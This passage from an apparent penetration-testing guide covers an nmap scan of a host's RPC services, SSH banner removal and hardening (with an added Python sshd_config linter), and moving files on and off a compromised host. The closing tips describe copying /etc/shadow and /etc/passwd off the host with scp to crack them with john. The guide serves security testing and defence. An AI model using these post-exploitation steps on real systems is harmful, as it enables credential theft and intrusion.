21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
79/tcp    open  finger
111/tcp   open  rpcbind (rpcbind V2-4)  2-4 (rpc #100000)
513/tcp   open  login
514/tcp   open  shell
4045/tcp  open  nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
6000/tcp  open  X11
6112/tcp  open  dtspc
6788/tcp  open  unknown
6789/tcp  open  ibm-db2-admin
7100/tcp  open  font-service
32771/tcp open  status (status V1)      1 (rpc #100024)
32772/tcp open  fmproduct (fmproduct V1) 1 (rpc #1073741824)
32773/tcp open  dmispd (dmispd V1)      1 (rpc #300598)
32774/tcp open  snmpXdmid (snmpXdmid V1) 1 (rpc #100249)
32777/tcp open  metad (metad V1-2)      1-2 (rpc #100229)
32778/tcp open  ttdbserverd (ttdbserverd V1) 1 (rpc #100083)
32779/tcp open  mdcommd (mdcommd V1)    1 (rpc #100422)
32780/tcp open  rpc.metamedd (rpc.metamedd V1) 1 (rpc #100242)
32781/tcp open  metamhd (metamhd V1)    1 (rpc #100230)
32782/tcp open  rusersd (rusersd V2-3)  2-3 (rpc #100002)
32783/tcp open  unknown
MAC Address: 00:0C:29:74:7D:D5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.39 seconds
Common RPC Services
Portmapper (needed)
nfs / mountd
rusers
yp*
sadmind
statd
CDE Calendar Manager Service Daemon (CMSD)
Recent or commonly found RPC service vulnerabilities
The sadmind bad boy is probably the most famous; however, there are a few more dotted around.
Figure 15: Exploiting sadmind
It's worth noting here that both Canvas and Metasploit have this vulnerability within their frameworks.
Figure 16: Metasploit sadmind
2.9 F9 – SSH
Identify the types and versions of ssh software in use
C:\Documents and Settings\Ed Williams>nc -vn 192.168.226.219 22
(UNKNOWN) [192.168.226.219] 22 (?) open
SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
This banner should be removed.
C:\Documents and Settings\Ed Williams>nc -vn 192.168.226.222 22
(UNKNOWN) [192.168.226.222] 22 (?) open
SSH-2.0-OpenSSH_
This can be achieved by editing the sshd binary with a hex editor (hexedit or vi) and searching and
removing the text.
Figure 17: Hexedit sshd
Securing ssh
By default, ssh has password authentication enabled; this should be disabled as it can be brute
forced (although very slowly). This can be configured in the /etc/sshd_config file:
Figure 18: ssh brute force
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes
The config file has a number of configurable security options, such as allow and deny hosts and the listening
port number; make sure that root cannot directly authenticate – it is better to log in as a standard user and su to
root.
# Authentication:
LoginGraceTime 120
PermitRootLogin no
StrictModes yes
It is also better to generate a key pair using ssh-keygen; you will need to add the public key into the authorized
keys file of the remote host, and enforce use of the from="" and command="" strings in the authorized keys file.
Ensure new keys have been generated for all hosts, with a minimum key length of 4096 bits.
Versions 1 and 2 of the ssh protocol
Since SSH-1 has inherent design flaws which make it vulnerable (e.g., man-in-the-middle attacks), it is now
generally considered obsolete and should be avoided by explicitly disabling fallback to SSH-1. While most
modern servers and clients support SSH-2, some organizations still use software with no support for SSH-2,
and thus SSH-1 cannot always be avoided.
In all versions of SSH, it is important to verify unknown public keys before accepting them as valid.
Accepting an attacker's public key as a valid public key has the effect of disclosing the transmitted
password and allowing man-in-the-middle attacks.
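The sshd_config points made across this section (password and empty-password authentication, direct root login, and any fallback to SSH-1) can be checked mechanically before a host goes live. The following is an added example, not code from the original document; it parses sshd_config keyword/argument lines the way sshd does (case-insensitive keywords, "#" comment lines, first occurrence of a keyword wins) and lints the result. The config text is a constructed sample built from the snippets shown above, and the defaults it assumes for absent keywords are noted in the code.

```python
"""Lint an sshd_config for the settings the SSH section calls out.

Added example, not part of the original document. It parses sshd_config
keyword/argument lines (keywords are case-insensitive, '#' lines are
comments, and the first occurrence of a keyword wins, as in sshd itself)
and reports password and empty-password authentication, direct root login
and any fallback to protocol version 1. The config text is a constructed
sample built from the snippets the document shows; the defaults assumed
for absent keywords are noted below.
"""
import re
from typing import Dict, List

SAMPLE_SSHD_CONFIG = """\
# constructed sample
Port 22
Protocol 2,1
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes
# Authentication:
LoginGraceTime 120
PermitRootLogin no
StrictModes yes
PermitRootLogin yes
"""

# keyword, then either '=' or whitespace, then the argument(s)
KEYVAL_RE = re.compile(r"^(\S+?)\s*(?:=|\s)\s*(.*)$")


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Lower-cased keyword -> first argument string seen."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYVAL_RE.match(line)
        if not m:
            continue
        settings.setdefault(m.group(1).lower(), m.group(2).strip())
    return settings


# Defaults assumed when a keyword is absent (OpenSSH of the document's era;
# newer releases default PermitRootLogin to prohibit-password).
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "permitrootlogin": "yes",
    "protocol": "2",
}


def lint_sshd_config(text: str) -> List[str]:
    """Findings against the effective settings; empty means nothing to report."""
    s = parse_sshd_config(text)

    def get(key: str) -> str:
        return s.get(key, DEFAULTS[key]).lower()

    findings = []
    if get("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication yes: passwords can be guessed; prefer keys")
    if get("permitemptypasswords") == "yes":
        findings.append("PermitEmptyPasswords yes: accounts without a password can log in")
    if get("permitrootlogin") not in ("no", "prohibit-password", "without-password"):
        findings.append(f"PermitRootLogin {get('permitrootlogin')}: log in as a user and su instead")
    if "1" in get("protocol").split(","):
        findings.append("Protocol allows SSH-1: remove the fallback")
    return findings


if __name__ == "__main__":
    for f in lint_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f)
```

Note the duplicated PermitRootLogin in the sample: sshd honours the first occurrence, so the later "yes" is ignored and the linter agrees, which is exactly the kind of thing a manual read of a long config gets wrong.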
Authentication mechanisms within ssh
Quite a few here – from passwords to key-pairs to certificates. Mentioned above.
2.10 Moving files on and off the compromised host
Once a host has been compromised, there will be a need to move files to and from it. This can be
achieved by using either of the following.
TFTP
Trivial File Transfer Protocol (TFTP) is a file transfer protocol with the functionality of a very basic form of File
Transfer Protocol (FTP).
You'll need the TFTP client installed on the compromised host and a TFTP server on your host. The
SolarWinds software set has a TFTP server. The following is an example of its usage:
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: tftp 192.168.226.1
tftp> put f
Sent 325 bytes in 0.0 seconds
tftp>
The file f will be placed in the tftp root directory on 192.168.226.1.
SCP
Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host
or between two remote hosts. It is based on the Secure Shell (SSH) protocol. If the ssh service is being
presented and providing you have valid credentials for the host then you will be able to move files to and
from the host.
Typically, the syntax of scp program is like the syntax of cp:
Copying file to compromised host:
scp SourceFile user@host:directory/TargetFile
Figure 19: scp’ing a file
This will copy the proto_ops.tgz file to the /tmp directory on 192.168.1.65 using jordan's credentials, which
have been enumerated using X11.
The inverse of this is also possible, i.e. copying a file from the compromised host:
scp user@host:directory/SourceFile TargetFile
Unix Tips
Once on the compromised host, do most of your work in /tmp.
Once you have escalated privileges, copy /etc/shadow and /etc/passwd to /tmp – remembering to
change permissions on the two files so you can scp them off and crack them with john on your box.
Create a directory on your host and work from there.
I find it easier to scp from my host and dump everything in the /tmp directory of the compromised host.
Useful References